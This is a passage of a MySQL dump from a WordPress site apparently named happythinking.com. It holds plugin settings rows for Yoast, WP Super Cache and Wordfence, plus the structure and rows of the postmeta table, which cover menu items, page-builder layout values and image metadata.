(189, 'wpseo_social', 'a:20:{s:13:"facebook_site";s:0:"";s:13:"instagram_url";s:0:"";s:12:"linkedin_url";s:0:"";s:11:"myspace_url";s:0:"";s:16:"og_default_image";s:0:"";s:19:"og_default_image_id";s:0:"";s:18:"og_frontpage_title";s:0:"";s:17:"og_frontpage_desc";s:0:"";s:18:"og_frontpage_image";s:0:"";s:21:"og_frontpage_image_id";s:0:"";s:9:"opengraph";b:1;s:13:"pinterest_url";s:0:"";s:15:"pinterestverify";s:0:"";s:7:"twitter";b:1;s:12:"twitter_site";s:0:"";s:17:"twitter_card_type";s:19:"summary_large_image";s:11:"youtube_url";s:0:"";s:13:"wikipedia_url";s:0:"";s:17:"other_social_urls";a:0:{}s:12:"mastodon_url";s:0:"";}', 'yes'),
(23569, 'supercache_stats', 'a:3:{s:9:"generated";i:1688161232;s:10:"supercache";a:5:{s:7:"expired";i:0;s:6:"cached";i:0;s:5:"fsize";i:0;s:11:"cached_list";a:0:{}s:12:"expired_list";a:0:{}}s:7:"wpcache";a:5:{s:7:"expired";i:0;s:6:"cached";i:0;s:5:"fsize";i:0;s:11:"cached_list";a:0:{}s:12:"expired_list";a:0:{}}}', 'yes'),
(232, 'wordfence_version', '7.11.5', 'yes'),
(233, 'wordfence_case', '1', 'yes'),
(234, 'wordfence_installed', '1', 'yes'),
(304, 'nav_menu_options', 'a:2:{i:0;b:0;s:8:"auto_add";a:0:{}}', 'yes'),
(230, 'wordfence_ls_version', '1.1.11', 'yes'),
(231, 'wfls_last_role_change', '1712173775', 'no'),
(284, 'category_children', 'a:0:{}', 'yes'),
(272, 'wpsc_feed_list', 'a:51:{i:0;s:157:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/page-sitemap.xml/wp-cache-e1d5602f18e6973cfda2ff3432dcef94.php";i:1;s:158:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/sitemap_index.xml/wp-cache-29ec94636661bef87fa794a2473ae9e6.php";i:2;s:157:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/page-sitemap.xml/wp-cache-e1d5602f18e6973cfda2ff3432dcef94.php";i:3;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:4;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:5;s:157:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/post-sitemap.xml/wp-cache-3648ef487acae9b8bca18a970719fcb5.php";i:6;s:153:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/happythinking.com/post-sitemap.xml/wp-cache-c87ed0a9062a5949eee2d3ff1f7f8a19.php";i:7;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/happythinking.com/sitemap_index.xml/wp-cache-534fcac2014e752e7e7d62f726d027c2.php";i:8;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:9;s:157:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/page-sitemap.xml/wp-cache-e1d5602f18e6973cfda2ff3432dcef94.php";i:10;s:158:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/sitemap_index.xml/wp-cache-29ec94636661bef87fa794a2473ae9e6.php";i:11;s:157:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/post-sitemap.xml/wp-cache-3648ef487acae9b8bca18a970719fcb5.php";i:12;s:153:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/happythinking.com/post-sitemap.xml/wp-cache-c87ed0a9062a5949eee2d3ff1f7f8a19.php";i:13;s:157:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/post-sitemap.xml/wp-cache-3648ef487acae9b8bca18a970719fcb5.php";i:14;s:153:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/happythinking.com/post-sitemap.xml/wp-cache-c87ed0a9062a5949eee2d3ff1f7f8a19.php";i:15;s:157:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/page-sitemap.xml/wp-cache-e1d5602f18e6973cfda2ff3432dcef94.php";i:16;s:158:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/sitemap_index.xml/wp-cache-29ec94636661bef87fa794a2473ae9e6.php";i:17;s:157:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/page-sitemap.xml/wp-cache-e1d5602f18e6973cfda2ff3432dcef94.php";i:18;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:19;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:20;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:21;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:22;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:23;s:158:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/sitemap_index.xml/wp-cache-29ec94636661bef87fa794a2473ae9e6.php";i:24;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:25;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:26;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:27;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:28;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:29;s:158:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/sitemap_index.xml/wp-cache-29ec94636661bef87fa794a2473ae9e6.php";i:30;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:31;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:32;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:33;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:34;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:35;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:36;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:37;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:38;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:39;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:40;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:41;s:157:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/page-sitemap.xml/wp-cache-e1d5602f18e6973cfda2ff3432dcef94.php";i:42;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:43;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:44;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:45;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:46;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:47;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:48;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";i:49;s:154:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/comments/feed/wp-cache-afe61f03577402ad23ced94b9f8ecdb4.php";i:50;s:145:"/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/www.happythinking.com/feed/wp-cache-2ca466fbcfd8f0b7a7402e1ab26c5aad.php";}', 'yes'),
(1208, 'wordfence_syncAttackDataAttempts', '0', 'no'),
(1209, 'wordfence_syncingAttackData', '0', 'no'),
(1211, 'wordfence_lastSyncAttackData', '1712762291', 'no'),
(275, 'WPLANG', '', 'yes'),
(276, 'new_admin_email', 'web21@freshgasflow.com', 'yes'),
(454, '_transient_health-check-site-status-result', '{"good":21,"recommended":2,"critical":0}', 'yes'),
(54688, 'wp_attachment_pages_enabled', '1', 'yes');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_postmeta`
--

CREATE TABLE `wpou_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wpou_postmeta`
--

INSERT INTO `wpou_postmeta` VALUES
(948, 1675, '_menu_item_type', 'post_type'),
(949, 1675, '_menu_item_menu_item_parent', '1690'),
(950, 1675, '_menu_item_object_id', '1661'),
(951, 1675, '_menu_item_object', 'page'),
(952, 1675, '_menu_item_target', ''),
(953, 1675, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(954, 1675, '_menu_item_xfn', ''),
(955, 1675, '_menu_item_url', ''),
(1096, 1509, '_wp_old_date', '2023-04-10'),
(957, 1676, '_menu_item_type', 'post_type'),
(958, 1676, '_menu_item_menu_item_parent', '1496'),
(959, 1676, '_menu_item_object_id', '1627'),
(960, 1676, '_menu_item_object', 'page'),
(961, 1676, '_menu_item_target', ''),
(962, 1676, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(963, 1676, '_menu_item_xfn', ''),
(964, 1676, '_menu_item_url', ''),
(966, 1677, '_menu_item_type', 'post_type'),
(967, 1677, '_menu_item_menu_item_parent', '1496'),
(968, 1677, '_menu_item_object_id', '1620'),
(969, 1677, '_menu_item_object', 'page'),
(970, 1677, '_menu_item_target', ''),
(971, 1677, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(972, 1677, '_menu_item_xfn', ''),
(973, 1677, '_menu_item_url', ''),
(975, 1678, '_menu_item_type', 'post_type'),
(976, 1678, '_menu_item_menu_item_parent', '1690'),
(977, 1678, '_menu_item_object_id', '1667'),
(978, 1678, '_menu_item_object', 'page'),
(979, 1678, '_menu_item_target', ''),
(980, 1678, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(981, 1678, '_menu_item_xfn', ''),
(982, 1678, '_menu_item_url', ''),
(1094, 1507, '_wp_old_date', '2023-04-10'),
(1504, 1641, 'footnotes', ''),
(1503, 1641, 'astra-migrate-meta-layouts', 'set'),
(1502, 1641, 'stick-header-meta', ''),
(1501, 1641, 'adv-header-id-meta', ''),
(1500, 1641, 'theme-transparent-header-meta', ''),
(993, 1680, '_menu_item_type', 'post_type'),
(994, 1680, '_menu_item_menu_item_parent', '1690'),
(995, 1680, '_menu_item_object_id', '1664'),
(996, 1680, '_menu_item_object', 'page'),
(997, 1680, '_menu_item_target', ''),
(998, 1680, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(999, 1680, '_menu_item_xfn', ''),
(1000, 1680, '_menu_item_url', ''),
(1095, 1508, '_wp_old_date', '2023-04-10'),
(1002, 1681, '_menu_item_type', 'post_type'),
(1003, 1681, '_menu_item_menu_item_parent', '1690'),
(1004, 1681, '_menu_item_object_id', '1658'),
(1005, 1681, '_menu_item_object', 'page'),
(1006, 1681, '_menu_item_target', ''),
(1007, 1681, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1008, 1681, '_menu_item_xfn', ''),
(1009, 1681, '_menu_item_url', ''),
(1011, 1682, '_menu_item_type', 'post_type'),
(1012, 1682, '_menu_item_menu_item_parent', '1690'),
(1013, 1682, '_menu_item_object_id', '1646'),
(1014, 1682, '_menu_item_object', 'page'),
(1015, 1682, '_menu_item_target', ''),
(1016, 1682, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1017, 1682, '_menu_item_xfn', ''),
(1018, 1682, '_menu_item_url', ''),
(1020, 1683, '_menu_item_type', 'post_type'),
(1021, 1683, '_menu_item_menu_item_parent', '1496'),
(1022, 1683, '_menu_item_object_id', '1034'),
(1023, 1683, '_menu_item_object', 'page'),
(1024, 1683, '_menu_item_target', ''),
(1025, 1683, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1026, 1683, '_menu_item_xfn', ''),
(1027, 1683, '_menu_item_url', ''),
(1029, 1684, '_menu_item_type', 'post_type'),
(1030, 1684, '_menu_item_menu_item_parent', '1496'),
(1031, 1684, '_menu_item_object_id', '1632'),
(1032, 1684, '_menu_item_object', 'page'),
(1033, 1684, '_menu_item_target', ''),
(1034, 1684, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1035, 1684, '_menu_item_xfn', ''),
(1036, 1684, '_menu_item_url', ''),
(1038, 1685, '_menu_item_type', 'post_type'),
(1039, 1685, '_menu_item_menu_item_parent', '1496'),
(1040, 1685, '_menu_item_object_id', '1616'),
(1041, 1685, '_menu_item_object', 'page'),
(1042, 1685, '_menu_item_target', ''),
(1043, 1685, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1044, 1685, '_menu_item_xfn', ''),
(1045, 1685, '_menu_item_url', ''),
(1047, 1686, '_menu_item_type', 'post_type'),
(1048, 1686, '_menu_item_menu_item_parent', '1690'),
(1049, 1686, '_menu_item_object_id', '1650'),
(1050, 1686, '_menu_item_object', 'page'),
(1051, 1686, '_menu_item_target', ''),
(1052, 1686, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1053, 1686, '_menu_item_xfn', ''),
(1054, 1686, '_menu_item_url', ''),
(1056, 1687, '_menu_item_type', 'post_type'),
(1057, 1687, '_menu_item_menu_item_parent', '1690'),
(1058, 1687, '_menu_item_object_id', '1641'),
(1059, 1687, '_menu_item_object', 'page'),
(1060, 1687, '_menu_item_target', ''),
(1061, 1687, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1062, 1687, '_menu_item_xfn', ''),
(1063, 1687, '_menu_item_url', ''),
(1065, 1688, '_menu_item_type', 'post_type'),
(1066, 1688, '_menu_item_menu_item_parent', '1690'),
(1067, 1688, '_menu_item_object_id', '1655'),
(1068, 1688, '_menu_item_object', 'page'),
(1069, 1688, '_menu_item_target', ''),
(1070, 1688, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1071, 1688, '_menu_item_xfn', ''),
(1072, 1688, '_menu_item_url', ''),
(1390, 1667, '_yoast_wpseo_meta-robots-noindex', '1'),
(1391, 455, '_edit_lock', '1688546347:1'),
(1479, 2110, 'adv-header-id-meta', ''),
(1480, 2110, 'stick-header-meta', ''),
(1416, 1690, '_wp_old_date', '2023-06-06'),
(1083, 1690, '_menu_item_type', 'custom'),
(1084, 1690, '_menu_item_menu_item_parent', '0'),
(1085, 1690, '_menu_item_object_id', '1690'),
(1086, 1690, '_menu_item_object', 'custom'),
(1087, 1690, '_menu_item_target', ''),
(1088, 1690, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1089, 1690, '_menu_item_xfn', ''),
(1090, 1690, '_menu_item_url', '#'),
(1092, 1500, '_wp_old_date', '2023-04-10'),
(1093, 1496, '_wp_old_date', '2023-04-10'),
(1332, 1919, '_edit_lock', '1688546382:1'),
(1333, 1919, '_edit_last', '1'),
(1334, 1919, '_yoast_wpseo_estimated-reading-time-minutes', '1'),
(1335, 1919, '_yoast_wpseo_wordproof_timestamp', ''),
(1493, 1034, 'stick-header-meta', ''),
(1492, 1034, 'adv-header-id-meta', ''),
(1119, 510, '_edit_lock', '1688546238:1'),
(1128, 1683, '_wp_old_date', '2023-05-30'),
(1127, 1496, '_wp_old_date', '2023-05-30'),
(1126, 1500, '_wp_old_date', '2023-05-30'),
(1123, 511, '_edit_lock', '1688546366:1'),
(1417, 1687, '_wp_old_date', '2023-06-06'),
(1418, 1682, '_wp_old_date', '2023-06-06'),
(1130, 1685, '_wp_old_date', '2023-05-30'),
(1131, 1677, '_wp_old_date', '2023-05-30'),
(1132, 1676, '_wp_old_date', '2023-05-30'),
(1133, 1684, '_wp_old_date', '2023-05-30'),
(1499, 1641, 'ast-site-content-layout', 'default'),
(1135, 1690, '_wp_old_date', '2023-05-30'),
(1136, 1687, '_wp_old_date', '2023-05-30'),
(1137, 1682, '_wp_old_date', '2023-05-30'),
(1138, 1686, '_wp_old_date', '2023-05-30'),
(1139, 1688, '_wp_old_date', '2023-05-30'),
(1140, 1681, '_wp_old_date', '2023-05-30'),
(1141, 1675, '_wp_old_date', '2023-05-30'),
(1142, 1680, '_wp_old_date', '2023-05-30'),
(1143, 1678, '_wp_old_date', '2023-05-30'),
(1144, 1507, '_wp_old_date', '2023-05-30'),
(1145, 1508, '_wp_old_date', '2023-05-30'),
(1146, 1509, '_wp_old_date', '2023-05-30'),
(1478, 2110, 'theme-transparent-header-meta', ''),
(119, 88, '_et_pb_use_builder', 'on'),
(120, 88, '_et_gb_content_width', ''),
(121, 88, '_edit_last', '1'),
(122, 88, '_et_pb_post_hide_nav', 'default'),
(123, 88, '_et_pb_page_layout', 'et_right_sidebar'),
(124, 88, '_et_pb_side_nav', 'off'),
(125, 88, '_et_pb_built_for_post_type', 'page'),
(126, 88, '_et_pb_ab_subjects', ''),
(127, 88, '_et_pb_enable_shortcode_tracking', ''),
(128, 88, '_et_pb_ab_current_shortcode', '[et_pb_split_track id="88" /]'),
(129, 88, '_et_pb_custom_css', ''),
(130, 88, '_et_pb_gutter_width', '3'),
(131, 88, '_thumbnail_id', '0'),
(132, 88, '_et_pb_first_image', ''),
(133, 88, '_et_pb_truncate_post', ''),
(134, 88, '_et_pb_truncate_post_date', ''),
(135, 88, '_et_builder_version', 'VB|Divi|4.9.4'),
(136, 88, '_et_pb_show_page_creation', 'off'),
(137, 88, '_wp_page_template', 'default'),
(138, 88, '_global_colors_info', '{}'),
(139, 88, 'site-sidebar-layout', 'default'),
(140, 88, 'site-content-layout', 'default'),
(141, 88, 'theme-transparent-header-meta', 'default'),
(142, 88, '_yoast_wpseo_content_score', '90'),
(143, 88, '_yoast_wpseo_estimated-reading-time-minutes', '2'),
(144, 88, 'site-post-title', 'disabled'),
(145, 88, '_yoast_wpseo_wordproof_timestamp', ''),
(913, 1646, '_yoast_wpseo_content_score', '60'),
(912, 1646, '_edit_last', '1'),
(911, 1646, '_edit_lock', '1691605800:1'),
(910, 1641, '_yoast_wpseo_content_score', '30'),
(909, 1641, '_yoast_wpseo_wordproof_timestamp', ''),
(908, 1641, '_yoast_wpseo_estimated-reading-time-minutes', '3'),
(907, 1641, '_edit_last', '1'),
(906, 1641, '_edit_lock', '1705071359:1'),
(1509, 2124, 'footnotes', ''),
(1507, 2122, 'footnotes', ''),
(1505, 2120, 'footnotes', ''),
(900, 1632, '_yoast_wpseo_content_score', '30'),
(899, 1632, '_yoast_wpseo_wordproof_timestamp', ''),
(898, 1632, '_yoast_wpseo_estimated-reading-time-minutes', '5'),
(897, 1632, '_edit_last', '1'),
(896, 1632, '_edit_lock', '1691605529:1'),
(198, 1496, '_menu_item_type', 'custom'),
(199, 1496, '_menu_item_menu_item_parent', '0'),
(200, 1496, '_menu_item_object_id', '1496'),
(201, 1496, '_menu_item_object', 'custom'),
(202, 1496, '_menu_item_target', ''),
(203, 1496, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(204, 1496, '_menu_item_xfn', ''),
(205, 1496, '_menu_item_url', '#'),
(1486, 2110, '_yoast_wpseo_estimated-reading-time-minutes', '2'),
(1487, 2110, '_yoast_wpseo_wordproof_timestamp', ''),
(1394, 2038, '_wp_attached_file', 'unhappycloudsface_21_7_2023.jpg'),
(1395, 2038, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:31:"unhappycloudsface_21_7_2023.jpg";s:8:"filesize";i:296485;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:39:"unhappycloudsface_21_7_2023-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:25094;}s:9:"thumbnail";a:5:{s:4:"file";s:39:"unhappycloudsface_21_7_2023-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:8620;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1489, 2114, 'footnotes', ''),
(1491, 1034, 'ast-site-content-layout', 'default'),
(1485, 2110, '_yoast_wpseo_content_score', '90'),
(1484, 2110, '_edit_last', '1'),
(1483, 2111, 'footnotes', ''),
(1482, 2110, 'footnotes', ''),
(1481, 2110, 'astra-migrate-meta-layouts', 'set'),
(1403, 2054, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:19:"cauldron_060823.jpg";s:8:"filesize";i:126975;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:27:"cauldron_060823-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:17246;}s:9:"thumbnail";a:5:{s:4:"file";s:27:"cauldron_060823-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:6802;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1400, 2041, '_wp_attached_file', 'shape_bounce_21_7_23.jpg'),
(1401, 2041, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:24:"shape_bounce_21_7_23.jpg";s:8:"filesize";i:170534;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:32:"shape_bounce_21_7_23-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:17427;}s:9:"thumbnail";a:5:{s:4:"file";s:32:"shape_bounce_21_7_23-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:6704;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(884, 1616, '_yoast_wpseo_estimated-reading-time-minutes', '4'),
(883, 1616, '_yoast_wpseo_content_score', '30'),
(882, 1616, '_edit_last', '1'),
(881, 1616, '_edit_lock', '1691337038:1'),
(1370, 1271, '_edit_lock', '1688129933:1'),
(1477, 2110, 'ast-site-content-layout', 'default'),
(1476, 2110, '_edit_lock', '1706458774:1'),
(932, 1661, '_edit_last', '1'),
(931, 1661, '_edit_lock', '1691606224:1'),
(930, 1658, '_yoast_wpseo_wordproof_timestamp', ''),
(929, 1658, '_yoast_wpseo_estimated-reading-time-minutes', '3'),
(928, 1658, '_yoast_wpseo_content_score', '30'),
(927, 1658, '_edit_last', '1'),
(926, 1658, '_edit_lock', '1691606358:1'),
(925, 1655, '_yoast_wpseo_wordproof_timestamp', ''),
(924, 1655, '_yoast_wpseo_estimated-reading-time-minutes', '4'),
(923, 1655, '_yoast_wpseo_content_score', '30'),
(922, 1655, '_edit_last', '1'),
(921, 1655, '_edit_lock', '1691606127:1'),
(920, 1650, '_yoast_wpseo_content_score', '30'),
(919, 1650, '_yoast_wpseo_wordproof_timestamp', ''),
(918, 1650, '_yoast_wpseo_estimated-reading-time-minutes', '4'),
(917, 1650, '_edit_last', '1'),
(915, 1646, '_yoast_wpseo_wordproof_timestamp', ''),
(916, 1650, '_edit_lock', '1691605865:1'),
(396, 451, 'site-sidebar-layout', 'default'),
(397, 451, '_yoast_wpseo_content_score', '30'),
(398, 451, '_yoast_wpseo_estimated-reading-time-minutes', '2'),
(399, 451, '_yoast_wpseo_meta-robots-noindex', '1'),
(400, 451, '_yoast_wpseo_meta-robots-nofollow', '1'),
(401, 451, '_et_pb_use_builder', 'on'),
(402, 451, '_et_gb_content_width', ''),
(403, 451, '_edit_last', '1'),
(404, 451, '_et_pb_post_hide_nav', 'default'),
(405, 451, '_et_pb_page_layout', 'et_right_sidebar'),
(406, 451, '_et_pb_side_nav', 'off'),
(407, 451, '_et_pb_built_for_post_type', 'page'),
(408, 451, '_et_pb_ab_subjects', ''),
(409, 451, '_et_pb_enable_shortcode_tracking', ''),
(410, 451, '_et_pb_ab_current_shortcode', '[et_pb_split_track id="451" /]'),
(411, 451, '_et_pb_custom_css', ''),
(412, 451, '_et_pb_gutter_width', '3'),
(413, 451, '_thumbnail_id', '0'),
(414, 451, '_et_pb_first_image', ''),
(415, 451, '_et_pb_truncate_post', ''),
(416, 451, '_et_pb_truncate_post_date', ''),
(417, 451, '_et_builder_version', 'VB|Divi|4.6.6'),
(418, 451, '_et_pb_show_page_creation', 'off'),
(419, 451, 'site-content-layout', 'default'),
(420, 451, 'theme-transparent-header-meta', 'default'),
(421, 455, '_yoast_wpseo_content_score', '90'),
(422, 455, '_yoast_wpseo_estimated-reading-time-minutes', '1'),
(423, 455, '_yoast_wpseo_meta-robots-noindex', '1'),
(424, 455, '_yoast_wpseo_meta-robots-nofollow', '1'),
(425, 455, '_et_pb_use_builder', 'on'),
(426, 455, '_et_gb_content_width', ''),
(427, 455, '_edit_last', '2'),
(428, 455, '_et_pb_post_hide_nav', 'default'),
(429, 455, '_et_pb_page_layout', 'et_right_sidebar'),
(430, 455, '_et_pb_side_nav', 'off'),
(431, 455, '_et_pb_built_for_post_type', 'page'),
(432, 455, '_et_pb_ab_subjects', ''),
(433, 455, '_et_pb_enable_shortcode_tracking', ''),
(434, 455, '_et_pb_ab_current_shortcode', '[et_pb_split_track id="455" /]'),
(435, 455, '_et_pb_custom_css', ''),
(436, 455, '_et_pb_gutter_width', '3'),
(437, 455, '_thumbnail_id', '0'),
(438, 455, '_et_pb_first_image', ''),
(439, 455, '_et_pb_truncate_post', ''),
(440, 455, '_et_pb_truncate_post_date', ''),
(441, 455, '_et_builder_version', 'VB|Divi|4.6.5'),
